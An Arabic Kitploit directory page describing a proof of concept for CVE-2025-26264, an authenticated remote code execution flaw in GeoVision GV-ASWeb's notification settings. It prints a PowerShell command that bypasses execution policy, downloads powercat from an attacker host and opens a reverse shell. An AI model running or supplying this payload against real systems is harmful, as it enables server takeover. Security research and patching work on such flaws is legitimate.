Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-26264 — CVE-2025-26264 - GeoVision GV-ASWeb بإصدار 6.1.2.0 أو أقل، يحتوي على ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) ضمن ميزة إعدادات الإشعارات الخاصة به. يمكن للمهاجم المُصادَق الذي يمتلك صلاحيات "إعدادات النظام" في ASWeb استغلال هذا الخلل لتنفيذ أوامر عشوائية على الخادم، مما يؤدي إلى اختراق كامل للنظام. | Kitploit
أدوات/GitHubGitHub/hxlxmj/cve-2025-26264
تحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubhxlxmj/cve-2025-26264

CVE-2025-26264

عرض المستودع
17منذ سنة واحدةلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

CVE-2025-26264 - GeoVision GV-ASWeb بإصدار 6.1.2.0 أو أقل، يحتوي على ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) ضمن ميزة إعدادات الإشعارات الخاصة به. يمكن للمهاجم المُصادَق الذي يمتلك صلاحيات "إعدادات النظام" في ASWeb استغلال هذا الخلل لتنفيذ أوامر عشوائية على الخادم، مما يؤدي إلى اختراق كامل للنظام.

مشاركة

CVE-2025-26264

CVE-2025-26264 - يحتوي GeoVision GV-ASWeb بإصدار 6.1.2.0 أو أقل على ثغرة تنفيذ التعليمات البرمجية عن بُعد (Remote Code Execution - RCE) ضمن ميزة إعدادات الإشعارات (Notification Settings). يمكن لمهاجم مُصادق يتمتع بصلاحيات "إعدادات النظام" (System Settings) في ASWeb استغلال هذا الخلل لتنفيذ أوامر عشوائية على الخادم، مما يؤدي إلى اختراق كامل للنظام.

المتطلبات

لتنفيذ هجوم ناجح، يحتاج المهاجم إلى:

  • وصول شبكي إلى تطبيق الويب GV-ASManager بإصدار 6.1.2.0 أو أقل؛
  • الوصول إلى حساب يتمتع بصلاحية إدارة ميزة إعدادات الإشعارات (Notification Settings).

الأثر

يمكن استغلال الثغرة لتنفيذ الإجراءات غير المصرح بها التالية:

  • الحساب الذي يتمتع بصلاحية إدارة ميزة إعدادات الإشعارات قادر على:
    • شن هجوم تنفيذ التعليمات البرمجية عن بُعد.
  • بعد الهجوم الناجح، سيكون المهاجم قادرًا على:
    • الوصول إلى معلومات النظام الحساسة أو تعديلها أو حذفها؛
    • زرع باب خلفي في النظام؛
    • شن هجوم فدية (Ransomware)؛
    • تنفيذ حركة جانبية داخل الشبكة الداخلية.

CVE-2025-26264 PoC [اختبار GeoVision v6.1.2.0]

يمكن استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد في منصة ASWeb التابعة لـ GeoVision GV-ASManager ضد الإصدارات 6.1.2.0 أو أقل (لا يوجد إصلاح حتى 26 فبراير 2025).

إن ميزة إعدادات الإشعارات (Notification Setting) في ASWeb التابعة لـ GeoVision ASManager معرضة لثغرة RCE

طلب HTTP لإعداد إشعار على حدث معين: محاولة تسجيل دخول فاشلة إلى TAWeb

وفقًا لهذا السكربت، إذا كانت هناك محاولة تسجيل دخول فاشلة إلى TAWeb، فسيتم تنفيذ سكربت PowerShell التالي:

powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell

محاولة مصادقة فاشلة في TAWeb

مضيف الضحية: يفتح السكربت بابًا خلفيًا إلى مضيف المهاجم.

مضيف المهاجم: يحصل المهاجم على شل (Shell)

التواصل

إذا كان لديك سؤال، يمكنك التواصل معي، Giorgi Dograshvili على LinkedIn.

تنزيل الأداة